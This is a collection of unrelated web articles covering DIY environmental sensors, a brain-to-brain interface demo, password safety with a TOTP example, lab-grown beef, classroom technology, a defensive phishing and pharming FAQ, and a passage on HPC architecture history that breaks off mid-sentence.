- Memory subsystems — Arguably the most important part of any HPC computer is the memory system. HPC applications tend to stream a few large data sets from storage through memory, into processors, and back again for a normal workflow. In addition, such requirements as sparse matrix calculations lead to requirements for fast access to non-contiguous data elements. The speed at which the data can be moved is the determining factor in the ultimate performance of a large portion, if not the majority, of HPC applications.
- Parallel system interconnects — Parallel computers essentially address the memory bandwidth problem by creating a logically two-dimensional memory structure. One dimension is within nodes, i.e., between a node's local memory and local processors. Total bandwidth in this case is the sum of all node bandwidths and is very high. The second dimension is the node-to-node interconnect, which is essentially a specialized local area network that is significantly slower in both bandwidth and latency measures than local node memories. As applications become less embarrassingly parallel, the communication over the interconnect increases, and the interconnect performance tends to become the limiting factor in overall application performance.
- Packaging — The speed of computer components, i.e., processors and memories, can be increased by reducing the temperature at which they run. In addition, parallel computing latency issues can be addressed by simply packing nodes closer together, which requires both fitting more wires into a smaller space and removing high amounts of heat from relatively small volumes.
Developing specialized HPC architectures has, up until recently, been limited by the effects of Moore's Law, which has shortened product cycle times for standard products and limited market opportunities for specialized systems. Those HPC architecture efforts that have gone forward have generally received support from government and/or large corporation R&D funds.
Waiting for a technology breakthrough (or the "then a miracle happens" strategy) is always an alternative; it is also the path of least resistance, and one step short of despair. Today we are looking at such technologies as optical computing, quantum entanglement communications, and quantum computers for potential future breakthroughs. The issue with relying on future technologies is that there is no way to tell, first, if a technology concept can be turned into a viable product — there is many a slip between the lab and the loading dock. Second, even if it can be shown that a concept can be productized, it is virtually impossible to predict when the product will actually reach the market. Even products based on well understood production technologies can badly overrun schedules, sometimes bringing to grief those vendors and users who bet on new products.
The above arguments suggest that the next age of high performance computing could be based on anything from reliance on clusters with speed-boost add-ons, to a brave new computer based on technologies that may not have been heard of yet. (You can never go wrong with a forecast like that.) That said, I am willing to lay odds on purpose-built computers becoming a major component, if not the defining technology, of the HPC market within the next five years, for two major reasons. First, there is no "easy" technical solution. Single-thread performance has plateaued; the usefulness of accelerators is dependent on both the parallelism inherent to the application and the connectivity between the accelerator and the rest of the system; and parallelism, while an advantage where it can be found, is not a panacea for computing performance. Second, the economics of HPC system development have changed. Users cannot simply sit back and wait for a faster CPU, but must make significant investments in either new software, or new architectures, or both. Staying with old economic models will lead to the computation tools defining the science, where work will be restricted to those areas that will run well on off-the-shelf computers. The HPC market is at a point where the business climate will support greater levels of innovation at the architectural level, which should lead to new organizing principles for HPC systems. The goal here is to find new approaches that will effectively combine and optimize the various standard components into systems that can continue to grow performance across a broad range of applications. Of course we can always wait for a miracle to happen.
<urn:uuid:d2ecbb23-3352-4122-a345-cc88e146e01c>
CC-MAIN-2017-09
https://www.hpcwire.com/2011/12/08/revisiting_supercomputer_architectures/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00398-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946065
2,254
3.3125
3
Almost a year after the Higgs boson announcement, the world's most powerful particle accelerator, the Large Hadron Collider (LHC), is getting upgraded. The work will result in increased collision energy and allow scientists to look even more closely at the universe's known and unknown building blocks. The need for the upgrade is related to thousands of electrical connections among the accelerator's magnets that weren't robust enough for the accelerator to run at the energy it was designed to reach. This design weakness led to major damage to the LHC in 2008. The Higgs boson belongs to one of the two classes of fundamental particles (bosons, as opposed to fermions), and it's a particular game-changer in the field of particle physics, demonstrating how particles gain mass, according to the CERN website. Long sections of the 27 kilometer LHC tunnel are actually straight. But when it's time for the beams of atomic particles to turn, large magnets are used to do the job. During this lull the accelerator's four detectors are also undergoing upgrades and maintenance, and can be viewed in greater detail. The detectors are designed to track the motion and measure the energy and charge of new particles thrown out in all directions after a collision. The goal is to have the LHC running in the spring of 2015. Send news tips and comments to firstname.lastname@example.org
<urn:uuid:ad13dfdc-b39c-4b38-bb15-3b0d90f72edb>
CC-MAIN-2017-09
http://www.networkworld.com/article/2168283/data-center/the-large-hadron-collider-shows-its-insides-as-upgrade-work-commences.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00446-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948498
274
3.078125
3
Internet of Things products are small, networked and, unfortunately, almost always have little or no security. Sometimes this is down to a lack of willingness by the manufacturer, but it is also partly due to the nature of the product – small and light means that these devices have few resources for complex security features such as encryption and packet inspection. This leads to vulnerabilities, numerous attack vectors and ultimately to a bot device which can be abused by almost anyone. Following the latest large-scale attacks that primarily use IoT devices as a digital army, there is a loud demand for more legislation and for governments to get involved. In a hearing before the Committee on Energy and Commerce of the US House of Representatives, the security guru Bruce Schneier stated that "catastrophic risks" would arise through the proliferation of insecure technology on the Internet. Whether there will be such a catastrophe, or whether the manufacturers of IoT devices will realize that the current way might not be the right one, remains to be seen. But until then something must be done to improve security, and at least for the problem of insufficient computing power there is a simple remedy: IoT Gateways. IoT Gateways have already existed for some time, albeit with a different focus. Until now they have been used primarily to link legacy devices that do not have a network interface to TCP/IP. Sometimes they are only used to control switching contacts via an IP address. In other cases, old machines or PLCs can still communicate but use a proprietary protocol rather than a standard one such as Ethernet, Modbus or Profibus. In this scenario, the IoT Gateway acts as a local intermediate station, receives data from sensors and actuators, extracts any information needed and forwards datagrams. It is also possible to store data at the gateway and only provide it on request, for example via an embedded web server. The evolution of the IoT gateway into a VPN client is a logical consequence of the well-known problem of insufficient computing power. NCP's IIoT Remote Gateway can be installed and used directly on systems or machinery, while the central IIoT Gateway encrypts data from the IIoT Remote Gateway for upstream processing. System manufacturers or operators benefit from more than encrypted communication: they gain back control over the configuration of security parameters and can commission systems more easily. Thanks to its multi-client capability, the management system is well suited to cloud environments or Industry 4.0 infrastructure which links several production sites or divisions via a common platform. If several production locations use a common platform, administrators can only access the production sites they need to manage and cannot access external data or protected areas. All connections between the end devices and the gateways are encrypted with advanced algorithms (for example using Suite B cryptography). For additional security, all machine certificates are managed in a Public Key Infrastructure (PKI). This ensures unique authentication for all end devices. During each connection, device certificates are checked for validity and trustworthiness (signed by a trusted Certification Authority [CA]) and for whether the certificate has been revoked, using an online or offline CA. If companies at least secured their IoT devices behind such a gateway, regardless of how powerful the devices are, governments could keep their regulatory watchdogs on a leash for a while.
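As a purely illustrative sketch of the gateway pattern described above (poll a legacy device locally, then forward its readings over an encrypted, certificate-authenticated channel to a central gateway), the following Python fragment uses only the standard library's ssl module. The hostnames, ports, certificate file names and the read_local_sensor() helper are hypothetical placeholders, and this is not NCP's actual product interface.

```python
import json
import socket
import ssl

# Hypothetical central gateway endpoint and credential files.
CENTRAL_GATEWAY = ("iiot-gateway.example.net", 8883)

# Validate the central gateway against a trusted CA and present this device's
# own certificate, mirroring the PKI-based mutual authentication described above.
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile="trusted_ca.pem")
context.load_cert_chain(certfile="device_cert.pem", keyfile="device_key.pem")
context.verify_mode = ssl.CERT_REQUIRED

def read_local_sensor() -> dict:
    # Placeholder for polling a legacy device over Modbus, a serial line, etc.
    return {"device_id": "press-04", "temperature_c": 71.3}

def forward_reading() -> None:
    reading = json.dumps(read_local_sensor()).encode()
    with socket.create_connection(CENTRAL_GATEWAY) as raw_sock:
        with context.wrap_socket(raw_sock, server_hostname=CENTRAL_GATEWAY[0]) as tls_sock:
            tls_sock.sendall(reading)  # the payload only ever travels encrypted

forward_reading()
```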
<urn:uuid:2a994237-2ff5-4fc8-a16a-090cc2f0d781>
CC-MAIN-2017-09
http://vpnhaus.ncp-e.com/2017/01/26/the-iot-gateway-next-door/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00622-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941141
653
2.9375
3
For years, community leaders have been turning to outside help to fix local problems. The process begins by looking at the community's strengths, weaknesses, opportunities and threats, better known as SWOT. But the focus is invariably on weaknesses rather than strengths, and often the community ends up believing that only outsiders know how to fix what's wrong. But a growing number of community activists are pushing a new approach based on appreciating the assets that exist in a community and using them to strengthen relationships among residents and to draw on these resources as a way to renew a rundown community. The idea is to identify or map a community's assets, in terms of individuals, associations and enterprises. Asset mapping focuses on opportunities that exist within a community and capitalizes on them, while identifying problems and dealing with them by leveraging the identified assets or resources, according to the Madii Institute, a Minnesota-based organization that assists communities with asset mapping. The concept is about connecting people to the resources within their community to share knowledge and skills in hopes of creating a stronger place to live. So far, technology hasn't played much of a role in asset mapping, but that may be changing.

A Valuable Tool

The Internet provides a valuable medium by which community members can come together online and share information. Web sites are relatively easy to set up, and with the infrastructure already in place, people need only to find a computer with a modem - at home, school, the library or a community center - to start connecting. Another useful technology is GIS. With its ability to link different types of information to geographic reference points and then layer them on electronic maps, GIS allows a community to see data spatially and how different community assets may relate. Meg Merrick, coordinator of the Community Geography Project at Portland State University, in Oregon, points out that many people simply don't know what exists within their community, but can get a better understanding through GIS. She mentioned how one community wanted to expand day-care services. Her students mapped existing day-care centers, as well as local churches that had space available for possible day-care facilities. Then, they overlaid census data to show where the largest concentrations of children were in the community. "Right away, they could see where there were holes in coverage and which churches were in the best location to help out," she said. But GIS isn't cheap. It calls for top-of-the-line Pentium computers to operate, data sets to populate the maps and potentially complicated software. These costs, together with training issues, can prove to be a formidable barrier for some communities hoping to map their assets electronically. One community that tried it found the experience expensive and, with only limited access to a GIS specialist to guide them, unfeasible in the long run, according to the Madii Institute. To help overcome some of the technical and nontechnical hurdles, the Ford Foundation provided Portland's Community Geography Project with a $259,000 grant to find better, cheaper ways to use GIS for community projects. According to Merrick, the university has launched a number of pilot projects in the Portland area by working closely with schools.
She explained that middle and high schools are able to get a hefty educational discount when it comes to purchasing GIS software and that the students are a helpful and inexpensive resource for collecting the necessary data about the community to populate the database. While the schools provide communities a low-cost entry point into the world of GIS and asset mapping, the exercise helps the students learn about critical thinking and the relationships between different sets of data. "More importantly, they can see when the information is right or wrong," Merrick explained.

Students Improving Communities

So far, the Community Geography Project has mapped the historical assets of an inner city neighborhood once populated by Portland's Asian community, which has now given way to gentrification. In a suburban community, students are using GIS to map natural assets before they are destroyed by development. The hope is to create a more sustainable community, with the most valuable environmental assets protected from sprawl. When GIS maps are placed on the Internet for a wide range of people to see, they can have a powerful effect. More people are drawn into the debate over what's best for a community and what can be done to improve it. But Merrick cautions local governments and community groups to be realistic about what can be achieved by running GIS over the Internet. "Internet mapping software has been sold as a way to provide public access to data," she said. "But the problem is that it's clunky to use online and it's highly controlled by those who are running the system, not the users." Still, interest in asset mapping in communities continues to grow, despite current technical limitations. Merrick's advice to communities wishing to map their assets with GIS is to understand the data they collect. "It takes training to interpret what you see on the map," she explained. "It's not just a matter of pushing buttons and serving up data on the Internet. It has to become part of the thought process, so that the community can view issues in new ways."
<urn:uuid:49e36449-69bb-4e11-bd1d-350eed75be60>
CC-MAIN-2017-09
http://www.govtech.com/featured/Mapping-Community-Assets.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00622-ip-10-171-10-108.ec2.internal.warc.gz
en
0.9681
1,053
2.703125
3
Users to write, run and debug software using quantum algorithms.
Google has launched its Quantum Computing Playground, a browser-based WebGL Chrome experiment, which will allow users to simulate quantum-scale computing right in the browser. The company said the web-based integrated development environment (IDE) will let users write, run and debug software using quantum algorithms. With Quantum Computing Playground you can also simulate quantum registers of up to 22 qubits and run Grover's and Shor's algorithms. The platform features a GPU-accelerated quantum computer simulator with a simple IDE interface and its own scripting language, along with debugging and 3D quantum state visualisation features. The interface presents the results in 2D and 3D graphs, with each bar representing a superposition of qubits, while the colour and height of the bars show the amplitude and phase of a given superposition.
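For context on what "simulating a quantum register" involves: the state of n qubits is a vector of 2^n complex amplitudes, so a 22-qubit register already means roughly 4.2 million amplitudes, which is why GPU acceleration helps. The short numpy sketch below (not the Playground's own scripting language) applies a Hadamard gate to one qubit of a two-qubit register and prints the amplitude and phase that the Playground's bar charts visualise.

```python
# Tiny state-vector simulation of a two-qubit register.
import numpy as np

H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)   # Hadamard gate
I = np.eye(2)

state = np.zeros(4, dtype=complex)
state[0] = 1.0                                  # start in |00>

# Apply H to the first qubit of the register.
state = np.kron(H, I) @ state

# Each basis state gets one "bar": its height is the amplitude's magnitude,
# its colour would encode the phase.
for index, amplitude in enumerate(state):
    print(f"|{index:02b}>  amplitude={abs(amplitude):.3f}  phase={np.angle(amplitude):+.3f} rad")
```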
<urn:uuid:f20a59f3-5832-40c6-9bfc-af34f0af2b36>
CC-MAIN-2017-09
http://www.cbronline.com/news/cloud/aas/experiment-with-quantum-computing-with-googles-quantum-computing-playground-4278316
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00146-ip-10-171-10-108.ec2.internal.warc.gz
en
0.864105
181
2.859375
3
More Tools Needed
Overall, biologics go all the way through the pipeline almost one-quarter of the time, a comparatively high success rate. Safety and toxicity concerns eliminate about 60 percent of drug candidates, but the remaining 40 percent fall prey to poor efficacy. Genomics research tools alone are ineffective in sorting which targets are useful to pursue, Kola said. Understanding the disease through an examination of the disease pathway and phenotypical expression is crucial to choosing which targets are involved in the establishment of disease. Also helping to refine the mountains of targets produced are the method of hypothesis testing and the examination of extreme and opposite cases. Nicholas Dracopoli, vice president of clinical discovery technologies at Bristol-Myers Squibb Co. of New York, came to a similar conclusion. Even representatives at research tool companies Perlegen Sciences Inc. and San Diego, Calif.-based Sequenom Inc. stressed that putting genomics data into context greatly enhances its usefulness. Even though the understanding of the genes related to particular diseases is rapidly evolving, which genes are key and what role they play in creating an outcome is often still unknown. In complex diseases, dozens of genes may be implicated, making it difficult to determine which are the most important to target, the executives said. And some targets cannot be treated with drugs. The costs of genomic analysis have dropped substantially in recent years. In 1989, it cost $200 million to discover the genetic basis of cystic fibrosis. Sequenom estimates that the cost of genomic analysis of a particular disease today is $500,000. The next step in linking knowledge of the disease to discoveries of genomics may be to enable systematic understanding of disease pathways and phenotypes. In an article published last week in the journal Nature and again at the BIO conference, Francis Collins, director of the National Human Genome Research Institute, called for the establishment of a biobank in the United States. This would create a publicly accessible, longitudinal database containing the biological material of at least half a million people. It would allow scientists to track diseased and nondiseased populations, as well as to access data on an individual preceding the onset of disease. The panelists seemed hopeful, yet cautious, that a biobank could be established. A similar effort in the United Kingdom is stymied so far. The biggest challenge to such an effort, Perlegen CEO Brad Margus said, is the need to design the study impeccably upfront, since the usability of any subsequent data would hinge entirely on the original design.
<urn:uuid:2b3b84f6-d51e-43af-9a1e-fbf5fc2e2de4>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Database/Bio-Bank-Needed-to-Optimize-Genetic-Research/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00498-ip-10-171-10-108.ec2.internal.warc.gz
en
0.9367
601
2.640625
3
The Age of Data Multiplication
We are surrounded by data; in both our personal and professional lives, digital traces of what we do are constantly being captured. This leads to exponentially increasing volumes of data, whether from Internet-connected devices, video, cell records, customer transactions, or healthcare and government records. Today, there is a growing awareness and sensitivity among end users, government agencies and lawmakers about how all of this data might be used, and in the coming years this concern is only set to heighten. Organizations leveraging cloud services to store this data may need to take a closer look at the lifespan of the data they collect and how it is expired and destroyed. Today's organizations need to understand that the cloud as a model causes data to multiply further. The dynamic nature of resource allocation and maximizing availability in a hybrid or public cloud means resources are replicated and backed up across multiple data centers. When an organization contacts the cloud provider to expire or expunge data, they may only be severing their client connection to the data. Organizations often don't allow for the fact that backup instances or traces of data may still linger and could be a source for unauthorized access. So, how do today's organizations ensure their data is destroyed?
1. Tag all sources of mission-critical data: It starts with strong preventative measures. If data is classified digitally to a scheme that is intuitive to your cloud provider and your organization, it will be easier to track through its lifecycle and then expire and destroy.
2. Take time to assign entitlements and access rights: Ensure that access rights or entitlements for sensitive or mission-critical data are limited to only those who have a legitimate need for access.
3. Apply encryption based on context: When data is encrypted, it is only readable to those with access to the encryption keys. It is the most certain way to limit unauthorized access to data in the cloud. By encrypting, organizations can be better assured of the confidentiality of their data and potentially be less concerned with their cloud providers' data destruction methods.
4. Perform data wipes: Many government and industry standards require data storage wipes to ensure that hardware is safe for reuse. There are different types of software and hardware that even allow for remote erasure. The benefit is to enable a provider or enterprise to repurpose the media for reuse.
5. Physically destroy data and media: In the case of highly classified information, organizations can use strong magnets to destroy data or even shred physical media. This ensures that the data on the destroyed media can never be recovered. Physical destruction methods are the last resort and only feasible in a private cloud environment.
By Evelyn de Souza
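Returning to point 3 in the list above: one reason encryption matters for data destruction is that it enables what is often called "crypto-shredding". Destroy every copy of the key and any lingering backup or replica of the ciphertext becomes unreadable. The sketch below is a minimal illustration using the third-party Python cryptography package; real deployments would keep keys in a KMS or HSM rather than in application code.

```python
# Minimal crypto-shredding illustration; key handling is deliberately oversimplified.
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # in practice held in a KMS/HSM, not in code
ciphertext = Fernet(key).encrypt(b"customer record 4711")

# The cloud provider only ever stores and replicates ciphertext.
print(ciphertext)

# "Destroying" the data then means destroying every copy of the key; any
# lingering backup of the ciphertext is unreadable without it.
key = None
```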
<urn:uuid:d9acc04c-b7df-4874-a555-466f09d03e00>
CC-MAIN-2017-09
https://cloudtweaks.com/2016/02/destroying-cloud-data-multiplication/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00498-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925304
552
2.703125
3
It seems like just yesterday you were still wrapping your head around the fact that VR is something that can potentially be influential, and now you learn that there's AR and MR. Here's a quick cue card / guide / infographic by Futurism to help you make sense of all the various iterations of reality that are starting to exist in this one field.

VR – Virtual Reality
This is probably the most well-known new reality. Unlike AR or MR, the computer-generated (3D) images and environments in a virtual reality require you to use special electronic equipment—most commonly helmets (with built-in screens) and motion-sensitive gloves. Virtual reality is completely digital, so there are some downsides (e.g., your own physical environment intruding on the illusion) to participating in this reality.

AR – Augmented Reality
The name is self-explanatory. Unlike Virtual Reality (VR), you're not escaping the real world in favor of a dreamlike state. In Augmented Reality (AR) a digital, computer-generated image is superimposed onto the real world. An example of Augmented Reality is the now infamous Tupac Shakur hologram which debuted at Coachella in 2012. For those who were physically present at Coachella, it looked as if Tupac were really on stage, but it was, of course, simply a digital mirage.

MR – Mixed/Hybrid Reality
What happens when you take all the best elements of VR and the ingenuity of AR? You get Mixed Reality (MR)! In this reality, the real world and the virtual world interact. It's not like AR, where the virtual world is merely visible in the real world—no. In Mixed Reality, the virtual world and the real world conspire to create a whole new paradigm. Imagine that you're dealing with case law and need to find a specific keyword or precedent in a non-digital legal journal. Scanning the entire journal using MR (with a device like Microsoft's HoloLens) would allow you to narrow your search faster.
By Glenn Blake
<urn:uuid:9b7f417e-d7cd-445a-884c-f73835efc59c>
CC-MAIN-2017-09
https://cloudtweaks.com/2016/11/infographic-mixed-hybrid-realities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00022-ip-10-171-10-108.ec2.internal.warc.gz
en
0.919937
438
2.65625
3
Last year, when an earthquake hit Melbourne, Twitter was the first on the scene. Within minutes, the subject became the top Twitter-trending topic worldwide and even caused the Geoscience Australia website to crash as people went online to see what had happened. The power of social media is beyond doubt. Social media is more than a passing trend, and its immediacy, ease of use and pervasive nature mean it will continue to displace other forms of communication as it becomes more embedded in everyday life. For federal government agencies, social media represents a compelling opportunity to share news, receive information and opinions from citizens, generate real-time awareness and debate and improve service delivery. And according to a recent Sensis survey -- completed with the Australian Interactive Media Industry Association -- the number of people using social media applications such as Facebook and Twitter to engage with government is on the rise. But the federal government may find it difficult to fulfill this demand due to inconsistent adoption and use of social media across federal government agencies. While there are pockets of excellence and innovation where agencies have incorporated social media into their everyday operations, there are some agencies that have only recently started putting social media to use, often driven by the fear of being left behind. The Australian Taxation Office (ATO), Department of Immigration and Citizenship (DIAC) and Department of Human Services (DHS) are examples of agencies that proactively use social media to engage with the public. The ATO uses Facebook, Twitter and YouTube to share information about recent tax changes, initiatives, products and services. It customises messages based on the specific social media application and its targeted constituents. It uses Twitter to communicate the latest updates and reminders of due dates, Facebook to foster interaction with its constituents and YouTube to provide videos on various tax administration topics. DIAC offers another example of using social media to good effect. It provides not only the more common applications such as Facebook, Twitter and YouTube but also a multitude of other services including Facebook chats, Flickr, a blog, Storify and an online newsroom to distribute information to the public and promote interaction on migration issues. The success of DIAC's social media effort is reflected not just in its number of Facebook fans and Twitter followers but also in the amount of reciprocal interaction it generates (e.g., comments, points of view shared, suggestions). On last viewing, DIAC had over 1600 "talking about this" counts on Facebook, an indicator of the number of unique users that have engaged with the page over the past seven days. Although not the only measure of success, the result indicates how well DIAC is inviting new content, participation and ongoing communication with its constituents. By way of comparison, the "talk about" count on DIAC's Facebook page is three times that of the equivalent US immigration Facebook page. Supporting multiple channels With the advent of ubiquitous mobile access, federal government departments are also adopting the use of mobile phone apps to support smartphone users. Agencies use apps to provide citizens with the information they need, when and where they need it.
The Department of Human Services (DHS) has developed self-serve apps that allow its targeted constituents, such as seniors, students, job seekers and families to claim entitlements and transact with the department in the same way they would using traditional channels. DHS offers an integrated multi-channel environment where citizens can engage with the department across the web, social media and mobile, as well as in person. While it is not surprising that large federal agencies are driving social media innovation, smaller organisations have also leveraged social media to meet their goals and objectives. For example, the Australian War Memorial (AWM) is a small corporation that has a strong understanding of its audience - what they want to know and discuss and how they can be engaged. AWM is using social media applications such as YouTube and Podcasts to communicate the Australian experience of war to its younger audience. Although social media is starting to grow among the federal agencies, its adoption remains relatively slow, especially when compared to its international counterparts. The US Customs and Border Protection, for instance, recently released an app that informs passengers of how long the wait is between getting off the plane and clearing through Customs. The social media presence of other agencies suggests that the adoption is sometimes reactive and less strategic, with some Facebook pages and Twitter accounts untouched for more than a year. Linking social to strategy Any investment in social media should be weighed like any other -- through a rational assessment of how the initiative links to the organisation's strategic direction. When developing social media strategies, agencies should consider what it means to citizens and how it will impact existing services, what capabilities need to be included, the expected customer experience, and the final outcomes. Agencies also need to map out how they manage any issues that may arise by having staff interact with citizens using social media platforms. It's also important to be aware of the common pitfalls during execution. These include failing to obtain management 'buy-in', not routinely evaluating and customising content, training staff only on social media tools and not communication skills, and forgetting to measure the impact of the social media effort. Fortunately for many agencies, the Australian Government Information Management Office (AGIMO) has been promoting the use of social media and the Government 2.0 initiative is a good starting point. As the public demand for real-time, digital interaction with government services continues to rise, federal agencies need to decide on how they will better leverage social media. Many agencies are already reaping the benefits of social media while others are still struggling to formulate a coherent response. Social media is here to stay and offers a compelling opportunity for federal agencies to improve service delivery to the Australian public. Pankaj Chitkara is an associate at Booz & Company in Canberra. He works with organisations on business and IT strategy, digitisation and enterprise architecture.
Satellite-based data centers with room for petabytes of data may start orbiting Earth as early as 2019. But when it comes to keeping secrets safe from the long arm of the law, the black void may not be far enough. Cloud Constellation, a startup in Los Angeles, is looking upward to give companies and governments direct access to their data from anywhere in the world. Its data centers on satellites would let users bypass the Internet and the thousands of miles of fiber their bits now have to traverse in order to circle the globe. And instead of just transporting data, the company’s satellites would store it, too. The pitch goes like this: Data centers and cables on Earth are susceptible to hacking and to national regulations covering things like government access to information. They can also slow data down as it goes through switches and from one carrier to another, and all those carriers need to get paid. Cloud Constellation’s system, called SpaceBelt, would be a one-stop shop for data storage and transport, says CEO Scott Sobhani. Need to set up a new international office? No need to call a local carrier or data-center operator. Cloud Constellation plans to sell capacity on SpaceBelt to cloud providers that could offer such services. Security is another selling point. Data centers on satellites would be safe from disasters like earthquakes, tornadoes, and tsunami. Internet-based hacks wouldn’t directly threaten the SpaceBelt network. The system will use hardware-assisted encryption, and just to communicate with the satellites an intruder would need an advanced Earth station that couldn’t just be bought off the shelf, Sobhani said. Cloud Constellation’s secret sauce is technology that it developed to cut the cost of all this from US$4 billion to about $460 million, Sobhani said. The network would begin with eight or nine satellites and grow from there. Together, the linked satellites would form a computing cloud that could do things like transcode video as well as storing bits. Each new generation of spacecraft would have more modern data-center gear inside. The company plans to store petabytes of data across this network of satellites. All the hardware would have to be certified for use in space, where it’s more prone to bombardment by cosmic particles that can cause errors. Most computer gear in space today is more expensive and less advanced than what’s on the ground, satellite analyst Tim Farrar of TMF Associates said. But the idea of petabytes in space is not as far-fetched as it may sound, said Taneja Group storage analyst Mike Matchett. A petabyte can already fit on a few shelves in a data-center rack, and each generation of storage gear packs more data into the same amount of space. This is likely to get better even before the first satellites are built. Still, Matchett thinks the first users to jump on SpaceBelt might be financial companies looking for shorter delays getting messages around the world. Cloud Constellation says its satellites could transmit information from low Earth orbit to the ground in a quarter of a second and from one point on Earth to another in less than a second. Any advantage that financiers could gain over competitors using fiber networks, which usually have a few seconds of end-to-end latency, would help them make informed trades more quickly. But if you do put your data in space, don’t expect it to float free from the laws of Earth. 
Under the United Nations Outer Space Treaty of 1967, the country where a satellite is registered still has jurisdiction over it after it's in space, said Michael Listner, an attorney and founder of Space Law & Policy Solutions. If Cloud Constellation's satellites are registered in the U.S., for example, the company will have to comply with subpoenas from the U.S. and other countries, he said. And while the laws of physics are constant, those on Earth are unpredictable. For example, the U.S. hasn't passed any laws that directly address data storage in orbit, but in 1990 it extended patents to space, said Frans von der Dunk, a professor of space law at the University of Nebraska. "Looking towards the future, that gap could always be filled."
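The latency argument can be made concrete with a rough propagation-delay calculation. The sketch below compares light travelling through glass along a terrestrial fiber route with light travelling through vacuum up to a low-Earth-orbit belt and back down. The route length and orbit altitude are illustrative assumptions, not Cloud Constellation figures, and only propagation is modelled; the switching, relaying and protocol overhead that dominate the end-to-end times quoted above are ignored.

```python
# Back-of-the-envelope propagation delays; every figure here is an
# illustrative assumption, not a SpaceBelt specification.
C_VACUUM_KM_S = 299_792                  # speed of light in vacuum (km/s)
C_FIBER_KM_S = C_VACUUM_KM_S * 2 / 3     # light in glass is roughly a third slower

def fiber_delay_ms(ground_km: float) -> float:
    """One-way propagation delay along a fiber route of the given length."""
    return ground_km / C_FIBER_KM_S * 1000

def leo_relay_delay_ms(ground_km: float, altitude_km: float = 1000) -> float:
    """One-way delay going up to a satellite belt, across it, and back down."""
    return (2 * altitude_km + ground_km) / C_VACUUM_KM_S * 1000

if __name__ == "__main__":
    route_km = 17_000   # roughly Sydney to London, as an example
    print(f"fiber     : {fiber_delay_ms(route_km):.0f} ms one way")
    print(f"LEO relay : {leo_relay_delay_ms(route_km):.0f} ms one way")
```

Even this crude model shows why a vacuum path can undercut glass over intercontinental distances, which is the advantage the financial users mentioned above would be chasing.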
Feel factor: Devices to detect and respond to users' moods

This article was changed April 9 to correct the date of the Boston Marathon bombing.

Computers may not yet have feelings, but the day seems to be quickly approaching when they will be able to detect and respond to how you are feeling. Cogito Corp., a Boston-based company, is currently working with the Defense Advanced Research Projects Agency to develop Cogito Companion, a smartphone application that gathers usage data and analyzes it for patterns of psychological distress. The application monitors the phone's location and time of use, and logs phone calls and text messages. Participants can choose to fill out questionnaires about their mood and can record audio diaries. Cogito's speciality – automated speech analysis – is performed on the audio diaries. In principle, the same analysis could be applied to phone conversations. Coincidentally, the application was being tested in April 2013 in Boston when two bombs went off near the finish line of the Boston marathon, giving Cogito a unique pre- and post-disaster data set for understanding posttraumatic stress disorder.

Dell's new research division is also working on developing a variety of computer-embedded sensors intended to detect users' moods. "We believe that the next step in providing contextual awareness is to provide computers with better cues for actual user intent," said Jai Menon, Dell's chief research officer. "Dell Research is exploring the potential applications of brain-computer interfaces (BCI) as one element of an approach to providing computers with better cues for actual user intent." According to Menon, the types of sensor data Dell researchers are currently experimenting with integrating include heart rate, perspiration and the like. "Biosignal sensors may currently have niche or very specialized uses, but we feel that they have the potential to become part of the suite of sensors that would be broadly used in future computer systems," Menon said.

The focus of Dell's experiments is to better understand the capabilities of sensors like electroencephalograms (EEG) to determine if the data is reliable and trustworthy. "How reliably does data from a consumer-grade EEG sensor reflect the actual mental state of a person? Do multi-channel EEG systems provide better fidelity? Do other types of sensors provide better accuracy? Can correlating data from multiple different sensor types provide superior fidelity?" (A toy illustration of this kind of cross-sensor correlation appears at the end of this article.) Menon said Dell is also interested in whether there are patterns of biosensor data that are shared across all users or if a system using biosensor data must be trained for each different user.

Dell's work is still in its early stages, according to Menon, too early to talk about specific products. But he said he foresees potential applications in healthcare, education, gaming and the workplace. "If a game could sense the player was bored, maybe it is time to make things more challenging or change the pace," Menon said. "Similarly, sensing frustration in the player, a game may offer a clue for solving a particularly difficult challenge. Games are designed to incite emotion: joy, triumph, amusement, terror, fascination. If the game could detect these states in users, it opens up the possibility to customize and optimize the experience for each player." In the workplace, if your computer senses you are working intensely, it might divert incoming phone calls directly to voice mail.
A teacher might use the embedded sensors to learn how engaged the class is and to change tactics when engagement flags. "The possibilities are endless," Menon said. "Our core intent is to make the capabilities of biosensors part of the portfolio of everyday capabilities that will bring value to people and improve end-user experience. Biosensors offer the promise of allowing computers to be much more intuitive about needs and mental state of users." Posted by Patrick Marshall on Apr 08, 2014 at 7:04 AM
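Menon's question about whether correlating several sensor types improves fidelity can be illustrated with a toy calculation. Everything below (the sensor choices, the readings and the threshold) is invented for illustration; it is not Dell's method, just the kind of cross-sensor arithmetic such a system might perform.

```python
import numpy as np

# Invented per-minute readings from two hypothetical sensors
heart_rate = np.array([62, 64, 70, 85, 90, 88, 72, 65], dtype=float)    # beats/min
skin_conductance = np.array([1.1, 1.2, 1.6, 2.4, 2.6, 2.5, 1.7, 1.3])   # microsiemens

# Pearson correlation between the two signals: high agreement suggests
# they are reporting the same underlying state
r = np.corrcoef(heart_rate, skin_conductance)[0, 1]
print(f"correlation between sensors: {r:.2f}")

def zscore(signal: np.ndarray) -> np.ndarray:
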